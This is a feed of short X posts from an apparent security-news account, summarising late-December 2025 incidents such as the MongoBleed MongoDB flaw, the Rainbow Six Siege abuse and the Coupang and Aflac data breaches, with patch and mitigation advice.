"🚨 Rainbow Six Siege Breach Grants Billions of R6 Credits Forces Ubisoft Shutdown Attackers abused internal moderation/marketplace systems to ban/unban players spoof ban-ticker messages and grant 2B R6 Credits/Renown plus unlock cosmetics prompting Ubisoft to take Siege and the Marketplace offline and roll back transactions since 11:00 UTC. 🕷 Malware: N/A 🎯 Target: Global/Gaming (Ubisoft Rainbow Six Siege) # Category: #Ubisoft #RainbowSixSiege #CyberAttack #GameSecurity #AccountAbuse #IncidentResponse #SupplyChain 🔗 URL:"
X Link 2025-12-28T08:09Z [--] followers, [---] engagements
"🚨 Ubisoft Confirms Rainbow Six Siege Abuse After Breach Grants Billions of In-Game Credits Attackers reportedly compromised Sieges backend/admin tooling to mass-grant 2B R6 Credits/Renown issue bans/unbans and unlock cosmetics forcing Ubisoft to take servers and the Marketplace offline and roll back impacted transactions while investigating. The incident highlights how privileged tooling abuse (even without malware) can cause large-scale fraud and service disruption. 🕷 Malware: N/A 🎯 Target: Global/Gaming (Ubisoft Rainbow Six Siege) # Category: #Ubisoft #RainbowSixSiege #CyberAttack"
X Link 2025-12-28T10:09Z [--] followers, [----] engagements
"🚨 Security Affairs Newsletter Round 556: LangChain LangGrinch MongoDB CVE-2025-14847 and Trust Wallet Fallout This weekly roundup consolidates high-impact late-December threats including the LangChain-core serialization injection bug enabling secret theft MongoDBs unauthenticated heap-memory leak (CVE-2025-14847) and the Trust Wallet Chrome extension incident plus additional breach/hacktivism and supply-chain updates. Use it as a rapid triage list to prioritize patching credential rotation and monitoring for exploitation across common enterprise and developer stacks. 🕷 Malware: N/A 🎯"
X Link 2025-12-28T10:39Z [--] followers, [---] engagements
"🚨 Troy Hunt Weekly Update 484: IoT Shelly Nirvana Ubiquiti Physical-to-Digital Security and Travel Notes Troys latest weekly update recaps upcoming travel lessons learned while hardening a home IoT setup (Shelly ecosystem) and how physical security overlaps with network security using Ubiquitiuseful reminders that smart environments expand the attack surface across both physical and digital layers. 🕷 Malware: N/A 🎯 Target: Global/Infosec + IoT & Physical Security # Category: #ThreatIntel #IoT #PhysicalSecurity #Ubiquiti #HomeLab #SecurityAwareness #Cybersecurity 🔗 URL:"
X Link 2025-12-28T11:42Z [--] followers, [--] engagements
"🚨 MongoDB CVE-2025-14847: Unauthenticated Heap-Memory Leak via zlib Compression A MongoDB server-side zlib compression flaw can let unauthenticated clients trigger responses containing uninitialized heap memory risking exposure of sensitive in-memory data and accelerating follow-on exploitation; patch to fixed versions (8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disable zlib compression until upgraded. 🕷 Malware: N/A 🎯 Target: Global/Databases & Backend Infrastructure # Category: #MongoDB #CVE202514847 #Vulnerability #InfoDisclosure #Zlib #DatabaseSecurity #PatchManagement 🔗"
X Link 2025-12-29T10:12Z [--] followers, [--] engagements
"🚨 MongoBleed Exploited in the Wild: 87K Exposed MongoDB Servers at Risk of Secret Leakage Attackers are actively exploiting MongoBleed (CVE-2025-14847) to remotely leak uninitialized heap memory from MongoDB via zlib compressionpotentially exposing credentials API/cloud keys session tokens and internal configs from internet-exposed instances. Patch immediately (fixed builds available since Dec 19) and hunt for abnormal high-volume connections in MongoDB logs as exploitation can be stealthy and hard to see in SIEMs. 🕷 Malware: N/A 🎯 Target: Global/Database Infrastructure (MongoDB) #"
X Link 2025-12-29T10:16Z [--] followers, [--] engagements
"🚨 MongoBleed (CVE-2025-14847) Exploited After PoC Release 87K+ MongoDB Servers Exposed SecurityWeek reports threat actors began exploiting the unauthenticated MongoDB zlib flaw shortly after technical details and a PoC were released enabling remote leakage of uninitialized heap memory (session tokens passwords API keys). Patch to fixed MongoDB versions (8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disable zlib compression and hunt logs for pre-auth exploitation attempts. 🕷 Malware: N/A 🎯 Target: Global/MongoDB Servers (Internet-Exposed) # Category: #MongoDB #MongoBleed"
X Link 2025-12-29T10:49Z [--] followers, [--] engagements
"🚨 Superagent: Open-Source Guardrails Framework to Control Agentic AI in Production Superagent helps teams run AI agents with enforced permissions runtime guardrails and full execution logging for auditability and incident response. A built-in Safety Agent evaluates prompts tool calls and outputs in real time against declarative policies to block or modify risky actions before they execute. 🕷 Malware: N/A 🎯 Target: Global/Enterprise (Agentic AI DevSecOps AppSec) # Category: #AgenticAI #AISecurity #LLMSecurity #Guardrails #DevSecOps #AppSec #OpenSource #Governance #Observability 🔗 URL:"
X Link 2025-12-29T10:55Z [--] followers, [--] engagements
"🚨 MongoBleed Detector Released: Offline Tool Spots CVE-2025-14847 Exploitation in MongoDB Logs An open-source agentless detector (by Neo23x0) scans MongoDB logs offline to flag MongoBleed exploitation by correlating connection/metadata/termination events (IDs 22943/51800/22944) and spotting the key anomaly: high-volume connections that never send client metadata. This matters because it enables rapid IR triage across many hosts (including rotated .gz logs) and prioritizes likely-active exploitation using severity thresholds (e.g. [---] conns 10% metadata 400/min bursts). 🕷 Malware: N/A 🎯"
X Link 2025-12-29T11:06Z [--] followers, [--] engagements
"🚨 MongoBleed Detector Released: Offline Log Scanner Flags CVE-2025-14847 Exploitation The new open-source MongoBleed detector scans MongoDB JSON logs offline to spot exploitation patterns by correlating connection accepted (22943) client metadata (51800) and connection closed (22944) eventsflagging high-volume bursts where attackers extract memory and disconnect without sending metadata. It supports compressed logs IPv4/IPv6 severity scoring (HIGH/MEDIUM/LOW/INFO) and optional SSH-based remote scanning to triage fleets quickly. 🕷 Malware: N/A 🎯 Target: Global/MongoDB Servers (4.48.2.2) #"
X Link 2025-12-29T11:13Z [--] followers, [--] engagements
"🚨 MongoBleed Exploited in the Wild: Pre-Auth MongoDB Memory Leak Exposes Secrets MongoDBs CVE-2025-14847 is now actively exploited letting unauthenticated attackers abuse zlib message decompression (length-field mishandling) to extract uninitialized heap memory that may contain credentials and other sensitive data from internet-exposed servers. Upgrade immediately to fixed releases (8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disable zlib compression until patched. 🕷 Malware: N/A 🎯 Target: Global/MongoDB Servers (Internet-Exposed) # Category: #MongoDB #MongoBleed #CVE202514847"
X Link 2025-12-29T11:20Z [--] followers, [--] engagements
"🚨 MongoBleed Exploited in the Wild: Pre-Auth MongoDB Memory Leak Exposes Secrets MongoDBs CVE-2025-14847 is now actively exploited letting unauthenticated attackers abuse zlib message decompression (length-field mishandling) to extract uninitialized heap memory that may contain credentials and other sensitive data from internet-exposed servers. Upgrade immediately to fixed releases (8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disable zlib compression until patched. 🕷 Malware: N/A 🎯 Target: Global/MongoDB Servers (Internet-Exposed) # Category: #MongoDB #MongoBleed #CVE202514847"
X Link 2025-12-29T13:20Z [--] followers, [--] engagements
"🚨 Fortinet Warns: 5-Year-Old FortiOS SSL-VPN 2FA Bypass Still Actively Exploited (CVE-2020-12812) Attackers can bypass FortiToken 2FA on vulnerable FortiGate SSL-VPN by changing the usernames letter case in specific local user + LDAP group configurations effectively authenticating without a second factor. Patch immediately (fixed FortiOS builds available since 2020) and remove unnecessary secondary LDAP groups / disable username case-sensitivity if you cannot upgrade. 🕷 Malware: N/A 🎯 Target: Global/Organizations Running FortiGate SSL-VPN with LDAP + 2FA # Category: #Fortinet #FortiOS"
X Link 2025-12-29T13:26Z [--] followers, [--] engagements
"🚨 Microsoft Copilot Adds GPT-5.2 as New Smart Plus Mode Microsoft is rolling out GPT-5.2 (a Thinking variant) in Copilot across web Windows and mobile as a free upgrade alongside GPT-5.1. The update aims to improve complex reasoning and knowledge-work tasks like document analysis coding and generating spreadsheets/presentations. 🕷 Malware: N/A (AI model rollout: GPT-5.2) 🎯 Target: Global/Productivity (Microsoft Copilot users) # Category: #Microsoft #Copilot #AI #GPT52 #GenAI #Windows #ProductUpdate 🔗 URL:"
X Link 2025-12-29T13:39Z [--] followers, [--] engagements
"🚨 Coupang Announces $1.17B Voucher Payout After 33.7M-Account Data Breach Coupang says an intrusion (discovered Nov 18) exposed customer PIIincluding names phone numbers delivery/email addresses and some order historiesimpacting up to [----] million Korea-based accounts. Starting Jan [--] [----] it will issue [-----] vouchers per affected user ($1.17B total) underscoring the scale of large-platform PII exposure and the business/regulatory fallout of voucher-based remediation. 🕷 Malware: N/A 🎯 Target: South Korea / E-commerce (Coupang customers) # Category: #DataBreach #Coupang #Privacy #PII"
X Link 2025-12-29T13:39Z [--] followers, [--] engagements
"🚨 Aflac Data Breach Exposes 22.65M Records After June [----] Intrusion Aflac says attackers accessed and exfiltrated data tied to [-----] million individuals after suspicious activity was detected on June [--] [----] impacting customers beneficiaries employees and agents; no ransomware encryption was observed. Stolen data includes SSNs DOB addresses drivers license/government IDs and medical/health insurance inforaising high identity-theft and medical-fraud risk and aligning with a broader campaign hitting the insurance sector. 🕷 Malware: N/A 🎯 Target: USA / Insurance # Category: #DataBreach"
X Link 2025-12-29T13:46Z [--] followers, [--] engagements
"🚨 Malware in [----] Breaks Out of Windows: Android Banking Trojans + macOS ClickFix Surge Malwarebytes reports 2025s malware shifted heavily to Android and macOShighlighting advanced Android banking trojans using overlays and human-like interaction tricks plus the ClickFix social-engineering technique spreading macOS stealers. The trend is accelerated by cross-platform malware built in Rust/Go and MaaS ecosystems expanding reach to mobile Linux and IoT. 🕷 Malware: Multiple (Herodotus Lumma AMOS Rhadamanthys) 🎯 Target: Global / Mobile & macOS Users # Category: #Malware #Android #macOS"
X Link 2025-12-29T13:48Z [--] followers, [--] engagements
"🚨 Check Point Weekly Threat Intel: Major Breaches Critical Vulns and Active Phishing/Malware Campaigns Check Points Dec [--] bulletin highlights disruptive incidents (ransomware encrypting Romanian Waters IT estate a La Poste outage claimed by NoName057(16) and Aflacs 22.7M-record breach) alongside high-impact flaws in MongoDB (MongoBleed) LangChain Core deserialization and Net-SNMP snmptrapd. It also flags active campaigns abusing Google Cloud Send Email workflows for credential phishing and long-running MgBot/Webrat activity delivered via DNS poisoning and fake GitHub PoCs. 🕷 Malware: MgBot"
X Link 2025-12-29T13:50Z [--] followers, [--] engagements
"🚨 Coupang Recovers Smashed Laptop Allegedly Used in Insider Data Breach Coupang says it recovered a smashed laptopreportedly weighted down and dumped in a riverlinked to an alleged insider leak and handed it to authorities as part of the investigation. The case underscores how insider access plus attempted evidence destruction can complicate breach containment attribution and legal response. 🕷 Malware: N/A 🎯 Target: South Korea / E-commerce # Category: #DataBreach #InsiderThreat #DigitalForensics #IncidentResponse #EvidenceHandling #Coupang #SouthKorea 🔗 URL:"
X Link 2025-12-29T14:25Z [--] followers, [--] engagements
"🚨 Korean Air Employee Data Exposed After KC&D Supplier Hack Linked to Clop Korean Air disclosed that a breach at its catering partner KC&D exposed employee data stored in an ERP system including names and bank account numbers with local reporting suggesting [-----] records were exfiltrated. Clop has claimed responsibility and allegedly published the stolen data increasing risk of targeted fraud and impersonation attempts against staff. 🕷 Malware: Clop (ransomware/extortion gang) 🎯 Target: South Korea / Aviation (Employees) # Category: #DataBreach #KoreanAir #Clop #Extortion #OracleEBS"
X Link 2025-12-29T14:27Z [--] followers, [--] engagements
"🚨 [--] Threats That Shaped Cybersecurity in 2025: From Telecom Espionage to React2Shell Dark Reading outlines five defining threats: China-linked Salt Typhoons ongoing telecom intrusions major CISA budget/layoff impacts the critical React2Shell (CVE-2025-55182) deserialization flaw self-propagating open-source malware like Shai-Hulud and supply-chain-style attacks abusing Salesforce integrations and OAuth tokens. 🕷 Malware: Shai-Hulud 🎯 Target: Global / Enterprise (Telecom + SaaS ecosystems) # Category: #ThreatIntel #SaltTyphoon #APT #CISA #React2Shell #CVE2025-55182 #Vulnerability"
X Link 2025-12-29T14:29Z [--] followers, [--] engagements
"🚨 Fortinet Warns of New Attacks Exploiting Old FortiOS 2FA Bypass (CVE-2020-12812) Fortinet reports renewed exploitation of CVE-2020-12812 where attackers can bypass FortiOS two-factor authentication in certain LDAP/remote-auth configurations by altering username case to avoid the 2FA prompt. This matters because it enables account compromise of FortiGate access paths (often internet-exposed) accelerating follow-on intrusion activity if admins havent patched or hardened affected setups. 🕷 Malware: N/A 🎯 Target: Global / Enterprise (FortiOS/FortiGate deployments) # Category: #Fortinet"
X Link 2025-12-29T14:32Z [--] followers, [--] engagements
"🚨 MongoBleed Exploited in the Wild: 87K+ MongoDB Servers Potentially Exposed Researchers report active exploitation of MongoBleed (CVE-2025-14847) a zlib decompression flaw that lets unauthenticated attackers leak uninitialized heap memory from MongoDBrisking exposure of secrets like credentials tokens and API keys. Patch immediately (fixed builds include 8.2.3/8.0.17/7.0.28/6.0.27/5.0.32/4.4.30) or disable zlib compression as a short-term mitigation. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / MongoDB (exposed database servers) # Category: #MongoDB #MongoBleed #CVE2025_14847"
X Link 2025-12-29T14:34Z [--] followers, [--] engagements
"🚨 K3 UltraMulti EDC Keychain Tool Review: Flashlight + UV + Laser + Igniter in a Pocket Gadget A compact (40g) keychain tool combining an 800-lumen beam 365nm UV red laser side flood/RGB lights magnetic mount/clip USB-C recharge and a short-duration ignition module. The main value is always-on-you utility but treat the igniter and laser as safety/compliance considerations depending on your environment. 🕷 Malware: N/A 🎯 Target: Global / Consumer EDC # Category: #EDC #Multitool #Flashlight #UVLight #LaserPointer #EverydayCarry #Gadgets 🔗 URL:"
X Link 2025-12-29T18:43Z [--] followers, [--] engagements
"🚨 Korean Air Employee Data Exposed After KC&D Supplier Breach Linked to Clop Korean Air says its former catering/duty-free unit KC&D was hacked leaking employee data (including names and bank account numbers) from an ERP server with [-----] staff potentially affected. Clop has claimed responsibility reinforcing how third-party compromises can quickly translate into high-risk fraud and impersonation exposure for employees. 🕷 Malware: Clop (ransomware/extortion gang) 🎯 Target: South Korea / Aviation (Employees) # Category: #DataBreach #KoreanAir #Clop #ThirdPartyRisk #SupplyChainAttack #ERP"
X Link 2025-12-29T18:45Z [--] followers, [--] engagements
"🚨 Weekly Recap: MongoDB Attacks Wallet Breaches Android Spyware Insider Crime & More This weekly recap rounds up late-2025 threats including active exploitation of MongoDB MongoBleed (CVE-2025-14847) a Trust Wallet Chrome extension compromise Evasive Panda DNS poisoning to deliver MgBot and renewed FortiOS 2FA-bypass abuseshowing how attackers are chaining old flaws SaaS keys and supply-chain exposure faster than defenders patch. 🕷 Malware: MongoBleed (CVE-2025-14847) MgBot 🎯 Target: Global / Multi-sector # Category: #ThreatIntel #MongoDB #MongoBleed #CVE2025_14847 #TrustWallet"
X Link 2025-12-29T18:51Z [--] followers, [---] engagements
"🚨 Linux & Open Source [----] Outlook: Desktop Growth Rust Momentum and a Firefox Cliff The article forecasts continued Linux desktop growth in [----] stronger open-source security and wider use of AI to assist (not replace) Linux kernel developmentwhile warning Firefox faces serious pressure. This matters because rising adoption and supply-chain complexity will force faster hardening better maintenance and clearer trust signals across core open-source projects. 🕷 Malware: N/A 🎯 Target: Global / Linux & Open Source Ecosystem # Category: #Linux #OpenSource #Cybersecurity #Rust #DesktopLinux #AI"
X Link 2025-12-29T18:52Z [--] followers, [--] engagements
"🚨 Critical XSpeeder 0-Day (CVE-2025-54322) Exposes 70K Edge Devices as Vendor Stays Silent Researchers disclosed an unauthenticated 0-day in XSpeeder SXZOS where injecting payloads into the chkid parameter of can yield remote command execution with full root control. With no patch after 7+ months of disclosure attempts and [-----] devices exposed online this enables rapid network takeover traffic interception and disruption in industrial/branch environments. 🕷 Malware: CVE-2025-54322 (XSpeeder SXZOS 0-day RCE) 🎯 Target: Global / Industrial & Branch Networks (Routers SD-WAN Edge devices) #"
X Link 2025-12-29T18:54Z [--] followers, [--] engagements
"🚨 Trust Wallet: [----] Wallets Drained After Malicious Chrome Extension Update Attackers compromised Trust Wallets Chrome extension v2.68.0 by injecting malicious JavaScript that exfiltrated wallet data leading to roughly $7M stolen from [----] wallet addresses. Trust Wallet urges immediate updates to v2.69 warns of follow-on phishing scams and says it is reimbursing verified victims. 🕷 Malware: Malicious Trust Wallet Chrome extension v2.68.0 (JS data exfiltration) 🎯 Target: Global / Crypto users (Chrome extension) # Category: #TrustWallet #CryptoTheft #SupplyChainAttack #BrowserExtension"
X Link 2025-12-29T18:58Z [--] followers, [--] engagements
"🚨 ChatGPT Mobile Adds Thinking Time Toggle for Standard vs Extended Reasoning OpenAI is rolling out a mobile update that finally lets Plus users choose between Standard and Extended Thinking aligning the Android experience with desktop for deeper longer reasoning on complex prompts. The change matters because it makes more compute when needed a user-controlled setting on mobile reducing silent downgrades and improving output consistency across devices. 🕷 Malware: N/A 🎯 Target: Global / AI Productivity (ChatGPT mobile users) # Category: #OpenAI #ChatGPT #MobileSecurity #AI #LLM"
X Link 2025-12-29T19:00Z [--] followers, [--] engagements
"🚨 Top US Accounting Firm Sax Discloses [----] Breach Impacting 220000+ Sax LLP says hackers accessed its network in late July/August [----] and stole files affecting [------] people with exposed data potentially including SSNs DOB drivers license/state IDs and passport numbers. The 16-month disclosure delay increases identity-theft risk because stolen PII is typically monetized quickly. 🕷 Malware: N/A 🎯 Target: USA / Accounting & Advisory (Clients/Individuals) # Category: #DataBreach #PII #IdentityTheft #Accounting #US #IncidentResponse #RiskManagement 🔗 URL:"
X Link 2025-12-29T19:05Z [--] followers, [--] engagements
"🚨 Hacker Dumped MacBook in River to Destroy Evidence in Coupang Data Theft Case Investigators say a former Coupang employee attempted to destroy evidence of a major data-theft incident by throwing a MacBook Air into a river but authorities recovered the device for forensic analysis. The case underscores how insider access plus attempted evidence destruction can complicate attribution containment and legal response. 🕷 Malware: N/A 🎯 Target: South Korea / E-commerce # Category: #DataBreach #InsiderThreat #DigitalForensics #IncidentResponse #EvidenceHandling #Coupang 🔗 URL:"
X Link 2025-12-29T19:07Z [--] followers, [--] engagements
"🚨 2.5M+ Exploit Attempts Slam Adobe ColdFusion Servers in Holiday Attack Wave Researchers observed a coordinated campaign firing 2.5+ million malicious requeststimed heavily on Christmas Dayprobing Adobe ColdFusion and [--] other stacks across [---] vulnerabilities. The actors used out-of-band callbacks (Interactsh) and targeted multiple ColdFusion RCE/bypass CVEs (e.g. CVE-2023-26359 CVE-2023-38205 CVE-2023-44353) consistent with initial-access-broker style scanning to quickly identify systems for follow-on compromise. 🕷 Malware: N/A (ProjectDiscovery Interactsh OAST + exploit-scanning) 🎯"
X Link 2025-12-29T19:07Z [--] followers, [--] engagements
"🚨 Critical XSpeeder SXZOS Zero-Day RCE Exposes 70000+ Internet-Facing Network Devices A pre-auth zero-day (CVE-2025-54322) in XSpeeder SXZOS networking devices enables unauthenticated attackers to execute arbitrary commands as root via a vulnerable web auth endpoint that unsafely eval()s base64-decoded input. With no patch available and tens of thousands of exposed hosts (common in industrial/branch environments) this is a high-probability mass-exploitation risk for initial access and full device takeover. 🕷 Malware: CVE-2025-54322 (XSpeeder SXZOS pre-auth Root RCE) 🎯 Target: Global /"
X Link 2025-12-29T19:38Z [--] followers, [--] engagements
"🚨 Airoha Bluetooth Headphone Flaws Let Attackers Hijack Paired Smartphones Three bugs (CVE-2025-20700/20701/20702) in Airohas RACE protocol allow nearby attackers to connect without authentication gain arbitrary memory read/write and extract the Bluetooth link key to impersonate trusted headphones. This can enable call/audio hijacking contact/call-log access and voice-assistant abuse on connected phones. 🕷 Malware: Airoha RACE protocol vulnerabilities (CVE-2025-20700 CVE-2025-20701 CVE-2025-20702) 🎯 Target: Global / Bluetooth Headphones & Connected Smartphones # Category: #Bluetooth"
X Link 2025-12-29T19:40Z [--] followers, [--] engagements
"🚨 Ubisoft Confirms Rainbow Six Siege Server Intrusion Tied to MongoBleed (CVE-2025-14847) Attackers exploited the MongoBleed MongoDB memory-disclosure flaw to tamper with Rainbow Six Siege infrastructure triggering mass account manipulation (credits/skins) ban-system abuse and service disruption. Reports also indicate follow-on actors may have leveraged the same weakness to steal large volumes of internal data escalating long-term IP and cheat-development risk. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / Gaming (Ubisoft Rainbow Six Siege) # Category: #Ubisoft #RainbowSixSiege"
X Link 2025-12-29T19:44Z [--] followers, [---] engagements
"🚨 AI-Powered Mycelial Mage Phishing Kit Targets Microsoft Outlook Credentials A Spanish-language phishing kit dubbed Mycelial Mage is stealing Outlook logins enriching them with IP/geolocation and exfiltrating via Telegram bots and increasingly via Discord webhooks to reduce forensic visibility. The toolkit also adds anti-analysis defenses (devtools traps console hijacking regex backtracking) and shows signs of AI-assisted module development. 🕷 Malware: Mycelial Mage (phishing kit) 🎯 Target: Global / Microsoft Outlook users (Spanish-speaking regions) # Category: #Phishing #CredentialTheft"
X Link 2025-12-29T19:46Z [--] followers, [--] engagements
"🚨 OpenAI Hardens ChatGPT Atlas to Resist Prompt-Injection Attacks OpenAI rolled out a security update for its browser-based ChatGPT Atlas agent that combines an adversarially trained model with stronger safeguards to detect and block prompt-injection attempts. The company is also scaling automated reinforcement-learning red teaming to discover novel multi-step attack strategies early and ship mitigations faster. 🕷 Malware: N/A 🎯 Target: Global / AI Agents (Browser-based automation) # Category: #OpenAI #ChatGPT #Atlas #PromptInjection #AgenticAI #AIsecurity #RedTeaming #AppSec 🔗 URL:"
X Link 2025-12-29T19:51Z [--] followers, [--] engagements
"🚨 2.5M+ Holiday Exploit Probes Hit Adobe ColdFusion in Coordinated Recon Campaign A threat actor ran a Christmas-week scanning operation generating 2.5M+ malicious requests across 47+ platforms including [----] ColdFusion-focused requests across [--] countries (68% of sessions in the U.S.). The campaign abused WDDX deserialization to trigger JNDI/LDAP injection (JdbcRowSetImpl gadget chain) and used Interactsh/OAST domains for callback verificationclassic initial-access-broker recon ahead of downstream intrusions. 🕷 Malware: N/A (Exploit-scanning; Interactsh/Nuclei-like tooling) 🎯 Target:"
X Link 2025-12-29T19:55Z [--] followers, [--] engagements
"🚨 Bluetooth Headphone Flaws Let Attackers Hijack Connected Smartphones Researchers disclosed three Airoha SoC issues (CVE-2025-20700/20701/20702) that allow nearby attackers to access the RACE protocol without proper authentication then extract the Bluetooth Link Key and impersonate trusted headphones to abuse the paired phone. This can enable covert eavesdropping and actions like call/audio hijack and voice-assistant abuse across popular brands. 🕷 Malware: N/A (Airoha RACE protocol vulnerabilities: CVE-2025-20700 CVE-2025-20701 CVE-2025-20702) 🎯 Target: Global / Bluetooth Headphones &"
X Link 2025-12-29T19:57Z [--] followers, [--] engagements
"🚨 Hacktivist Proxy Ops Become a Repeatable Playbook for Geopolitical Cyber Pressure Report highlights a repeatable model where hacktivist campaigns surge immediately after geopolitical triggers (sanctions military aid diplomatic events) using low-complexity DDoS/defacement/claimed leaks to maximize public disruption and plausible deniability. The risk is sustained operational and psychological pressure on public-facing services (gov finance transport media) that forces reactive defense and drains IR capacity. 🕷 Malware: N/A 🎯 Target: Global / Government & Critical Services # Category:"
X Link 2025-12-29T19:59Z [--] followers, [--] engagements
"🚨 Coupang Data Breach Suspect Dumped MacBook in River Investigators Recovered It The suspected actor behind Coupangs personal data leak allegedly threw a MacBook Air into a river to destroy evidence but it was recovered and is being used for forensic investigation. The case highlights how insider-driven breaches often include anti-forensics making rapid evidence preservation critical for attribution and legal action. 🕷 Malware: N/A 🎯 Target: South Korea / E-commerce # Category: #DataBreach #Coupang #InsiderThreat #DigitalForensics #IncidentResponse #EvidenceHandling #SouthKorea 🔗 URL:"
X Link 2025-12-29T20:02Z [--] followers, [--] engagements
"🚨 Aflac Data Breach Exposes 22M People in Major Cyber Breach Aflac confirmed a June [----] intrusion impacted [--] million people exposing sensitive PII and medical/claims-related data across customers employees agents and beneficiaries. The company says it contained the attack quickly and is offering impacted individuals two years of identity/medical-fraud protection services. 🕷 Malware: N/A 🎯 Target: USA / Insurance # Category: #DataBreach #Aflac #PII #HealthData #IdentityTheft #MedicalFraud #IncidentResponse #Cybercrime 🔗 URL:"
X Link 2025-12-29T22:08Z [--] followers, [--] engagements
"🚨 AI Slop and Brainrot Are Flooding YouTube ShortsAnd the Algorithm Is Rewarding It A Kapwing analysis found that roughly [--] in [--] Shorts shown to new users qualifies as low-quality AI-generated slop while about a third of early recommendations fall into brainrot attention-farming content. The report argues the incentives (cheap production + reliable reach) are accelerating spam-like content factories degrading discovery quality and increasing misinformation risk at scale. 🕷 Malware: N/A 🎯 Target: Global / Social Media (YouTube) # Category: #AISlop #Brainrot #YouTubeShorts #ContentIntegrity"
X Link 2025-12-29T22:13Z [--] followers, [--] engagements
"🚨 Ubisoft Shuts Down Rainbow Six Siege After MongoDB Exploit Hits Players Attackers abused the MongoBleed MongoDB memory-leak flaw to compromise Rainbow Six Siege backend systems enabling disruptive actions like mass credit grants bans/unbans and in-game manipulation. The incident shows how a single internet-exposed database weakness can translate into full platform-level takeover and large-scale user impact. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / Gaming (Ubisoft Rainbow Six Siege players) # Category: #Ubisoft #RainbowSixSiege #MongoDB #MongoBleed #CVE2025_14847 #Exploit"
X Link 2025-12-29T22:50Z [--] followers, [---] engagements
"🚨 Coupang to Pay $1.1B in Vouchers After Massive Customer Data Breach Coupang announced a 1.685T ($1.1B) voucher compensation plan for 33.7M notified accounts after a major personal data exposure with distribution starting January [--] [----]. The move underscores the scale of breach fallout in large consumer platformswhere remediation costs regulatory scrutiny and trust erosion can exceed the technical incident itself. 🕷 Malware: N/A 🎯 Target: South Korea / E-commerce # Category: #DataBreach #Coupang #Privacy #PII #SouthKorea #Ecommerce #IncidentResponse 🔗 URL:"
X Link 2025-12-29T22:52Z [--] followers, [--] engagements
"🚨 Elevation Lab TimeCapsule Review: Give AirTags a 5-Year Battery Without the Bulk Elevation Labs compact TimeCapsule replaces the AirTags CR2032 with AAA lithium cells in an IP69-sealed case extending battery life to [--] years while keeping the tracker usable for travel/gear tracking. The tradeoff is slightly reduced speaker volume but it materially lowers battery died at the worst time risk for long-term asset tracking. 🕷 Malware: N/A 🎯 Target: Global / Consumer Tracking (Apple AirTag users) # Category: #Apple #AirTag #Security #AssetTracking #Privacy #Bluetooth #Gadgets #Review 🔗 URL:"
X Link 2025-12-29T22:56Z [--] followers, [--] engagements
"🚨 MongoBleed Exploitation Spreads as Defenders Race to Patch MongoDB CyberScoop reports MongoBleed (CVE-2025-14847)a zlib-driven unauthenticated memory-leak in widely deployed MongoDB versionsis now under active exploitation with CISA adding it to KEV after a public PoC dropped Dec [--]. With tens of thousands of exposed instances (Shadowserver 75K; Censys 87K) and bleed-style low-forensic footprint stolen secrets (credentials/tokens) can enable rapid lateral movement and follow-on compromise. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / Cloud & Internet-Exposed MongoDB #"
X Link 2025-12-29T22:59Z [--] followers, [---] engagements
"🚨 Gentlemen Ransomware Disrupts Romanias Oltenia Energy Complex A ransomware attack on Dec [--] encrypted files and knocked key business IT services offline (ERP document management email website) at Romanias largest coal power producer while the national energy supply was not impacted. The company isolated affected systems notified authorities and is restoring from backups as it investigates potential data theft. 🕷 Malware: Gentlemen ransomware 🎯 Target: Romania / Energy # Category: #Ransomware #Gentlemen #Romania #Energy #CriticalInfrastructure #IncidentResponse #BCP #CyberCrime 🔗 URL:"
X Link 2025-12-29T23:01Z [--] followers, [--] engagements
"🚨 US & Australia Confirm Active Exploitation of MongoBleed (CVE-2025-14847) US CISA and Australias ACSC warn attackers are actively exploiting MongoBleed a MongoDB zlib-related memory disclosure bug that can leak sensitive data (e.g. database passwords cloud secrets) from vulnerable internet-exposed deployments. CISA added it to the KEV catalog and set a federal patch deadline of Jan [--] signaling high-confidence real-world abuse. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / MongoDB (internet-exposed databases; cloud environments) # Category: #MongoDB #MongoBleed #CVE2025_14847"
X Link 2025-12-29T23:05Z [--] followers, [---] engagements
"🚨 Coupang to Split $1.17B in Vouchers After 33.7M-Account Data Breach Coupang will begin issuing four single-use vouchers totaling [-----] won ($34) per affected user starting Jan [--] [----] after a breach discovered in mid-November that originated on June [--] and exposed Korean customers PII (names emails addresses order info). Investigators say the suspect retained data from [----] accounts and even dumped a MacBook Air in a river to destroy evidence underscoring insider-risk and forensic challenges at scale. 🕷 Malware: N/A 🎯 Target: South Korea / E-commerce # Category: #DataBreach #Coupang #PII"
X Link 2025-12-29T23:07Z [--] followers, [--] engagements
"🚨 CrowdStrike Launches Falcon for IT Turnkey Automations (GA) CrowdStrike says Falcon for IT now offers generally available turnkey automations (prebuilt content packs) to automate common IT/security workflowslike application resilience/health checks file indexing for investigations and Linux device controlwithout custom scripting. This reduces operational overhead and speeds response by running automation through the existing Falcon sensor and providing dashboards to track outcomes. 🕷 Malware: N/A 🎯 Target: Global / Enterprise IT & SOC Operations # Category: #CrowdStrike #Falcon"
X Link 2025-12-30T00:08Z [--] followers, [--] engagements
"🚨 70000+ MongoDB Servers Exposed to MongoBleed zlib Memory-Leak Attacks MongoDBs CVE-2025-14847 allows unauthenticated attackers to leak uninitialized heap memory via zlib-compressed traffic potentially exposing secrets like credentials and API keys from vulnerable internet-facing instances. Immediate upgrades (e.g. 8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disabling zlib compression are the primary mitigations. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / Internet-exposed MongoDB # Category: #MongoDB #MongoBleed #CVE2025_14847 #Vulnerability #Exploit"
X Link 2025-12-30T06:17Z [--] followers, [--] engagements
